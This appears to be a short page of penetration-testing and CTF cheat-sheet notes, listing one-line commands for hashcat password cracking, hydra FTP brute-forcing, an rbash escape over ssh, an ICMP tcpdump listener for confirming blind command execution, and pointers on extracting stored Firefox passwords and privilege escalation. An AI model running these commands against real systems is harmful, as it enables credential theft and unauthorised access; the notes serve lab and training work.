Miscellaneous

hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force

scp important.txt ubuntu@192.168.1.30:/home/ubuntu/transferred.txt

wget -m ftp://ftpuser:givemefiles777@10.10.94.48

python -m pyftpdlib 21 hydra -e nsr -l elly ftp://192.168.249.148

Turn passwd file into userlist to use in bruteforce: cut -d ":" -f 1 passwd > userlist

GitHub - PinkDraconian/CTF-bash-tools: Toolset for automating common management actions used in CTF'sGitHub

TCPDUMP LISTENER

Start a tcpdump listener on your local machine.

If using your own machine with the VPN connection, use:

sudo tcpdump ip proto \\icmp -i tun0

If using the Ethernet, use:

sudo tcpdump ip proto \\icmp -i eth0

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

ping <ATTACKER IP> -c 4

If we know the ssh credentials of the user who is part of rbash shell, then you can use the following command along ssh to break the jail and bypass the rbash by accessing proper bash shell.

ssh seppuku@192.168.53.90 -t "bash --noprofile"

Python Library Hijacking

Linux Privilege Escalation: Python Library Hijacking - Hacking ArticlesHacking Articles

Exploiting Wildcard

Exploiting Wildcard for Privilege Escalation - Hacking ArticlesHacking Articles

Mozilla History Decrypt

.mozilla directory, which holds firefox’s history of it’s user can be used to get credentials. logins.json holds the encrypted login credentials.

GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub

Website:   https://tryhackme.com
Username: 'chris_w@vulnnet.thm'
Password: '{Redacted}'

PreviousLinux Privilege Escalation NextRedis

Last updated 2 years ago

Was this helpful?